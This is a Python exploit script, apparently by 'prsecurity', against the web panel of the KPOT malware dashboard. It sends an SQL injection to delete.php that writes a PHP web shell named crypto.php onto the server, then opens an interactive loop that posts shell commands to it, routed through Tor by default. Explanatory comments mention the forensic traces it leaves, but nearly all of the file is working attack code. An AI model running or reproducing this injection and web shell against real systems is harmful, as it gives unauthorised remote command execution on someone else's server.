1import requests
2import argparse
3import base64
4
5# requires pysocket for tor and requests for requests :-p
6
def get_args():
    """Parse the command line.

    Positional ``target`` is the panel URL; ``-p/--proxy`` is handed to the
    caller unchanged and defaults to a local SOCKS5 endpoint on port 9150
    (the help text labels this "tor").

    Returns:
        argparse.Namespace with ``target`` and ``proxy`` attributes.
    """
    def _compact_help(prog):
        # Widen the help column so the long --proxy description fits one line.
        return argparse.HelpFormatter(prog, max_help_position=50)

    epilog_text = '''
This script will exploit the RCE/SQL vulnerability in KPOT Dashboard.
'''
    cli = argparse.ArgumentParser(
        prog="kpot_sploit.py",
        formatter_class=_compact_help,
        epilog=epilog_text,
    )
    cli.add_argument("target", help="URL of WebPanel (ex: http://target.com/panel/)")
    cli.add_argument(
        "-p", "--proxy",
        default="socks5://localhost:9150",
        help="Configure a proxy in the format http://127.0.0.1:8080/ (default = tor)",
    )
    return cli.parse_args()
19
def pwn_target(target, proxy):
    """Send the SQL-injection request to the panel, then loop on an interactive prompt.

    Args:
        target: Base URL of the panel; '/delete.php' and '/crypto.php' are
            appended to it verbatim, so a trailing slash yields a double slash.
        proxy: Proxy URL used for both http and https traffic.

    Side effects (all visible below): one plaintext HTTP request to a
    third-party IP-echo service, one GET to the panel, then one POST per
    prompt line until Ctrl-C. The injected SQL uses SQLite's ATTACH DATABASE
    to write a file named 'crypto.php' on the panel host -- that file, and a
    delete.php request whose bot_id parameter contains SQL keywords, are the
    artefacts a panel operator or incident responder would look for.

    Raises:
        Re-raises any exception other than KeyboardInterrupt after printing
        the last response body.
    """
    # verify=False is used on every request below; this silences urllib3's
    # InsecureRequestWarning, so certificate errors on the target go unnoticed.
    requests.packages.urllib3.disable_warnings()
    proxies = {'http': proxy, 'https': proxy}
    print('[*] Probing...')
    # bot_id is an SQLite injection: the quoted value is closed, ATTACH creates
    # 'crypto.php' as a new database file, and the row inserted into it
    # carries a PHP one-liner; '--' comments out the rest of the query.
    get_params = {
        'bot_id':"666'; ATTACH DATABASE 'crypto.php' AS dba; CREATE TABLE IF NOT EXISTS dba.mytable(text TEXT NOT NULL); INSERT INTO dba.mytable VALUES('<?php echo system($_POST[\"cmd\"]); ?>'); --",
        'file':'123'
    }
    try:
        # Egress check: goes over plain HTTP through the configured proxy and
        # prints whatever the service returns. NOTE(review): if this call
        # raises, `r` is still unbound and the bare except below fails with
        # NameError at print(r.text), hiding the original error.
        r = requests.get("http://bot.whatismyipaddress.com", proxies=proxies)
        print("[*] Your IP: {}".format(r.text))
        headers = {
            "User-agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0"
        }
        # The injection request; redirects are not followed and the response
        # body is not inspected, so success is not verified here.
        r = requests.get(target + '/delete.php', params=get_params, headers=headers, verify=False, proxies=proxies, allow_redirects=False)
        print('[+] If it worked, you will get a funky shell...')
        while(1):
            try:
                cmd = input("$ ")
                # Each prompt line is POSTed as 'cmd' to the file written above.
                r = requests.post(target + '/crypto.php', data={'cmd':cmd}, headers=headers, verify=False, proxies=proxies, allow_redirects=False)
                # The first 300 bytes are skipped; presumably SQLite's file
                # header and table bytes precede the PHP output -- unverified.
                print(r.text[300:])
            except KeyboardInterrupt:
                print("[+] Bye! Don't forget to clean up.")
                # `exit` here is the site module's helper, not sys.exit.
                exit(0)
    except:
        # Bare except: catches SystemExit from exit(0) too, so the farewell
        # path also prints this error line and the last body before re-raising.
        print("[-] ERROR: Something went wrong.")
        print(r.text)
        raise
48
def main():
    """Entry point: print the banner, parse the CLI, then hand off to pwn_target."""
    for banner_line in ("", "KPOT RCE by prsecurity."):
        print(banner_line)
    opts = get_args()
    # Strip stray whitespace so the URL join and proxy parsing are not thrown off.
    pwn_target(opts.target.strip(), opts.proxy.strip())
54
55
# Guarded entry point: importing the module defines the functions only.
if __name__ == '__main__':
    main()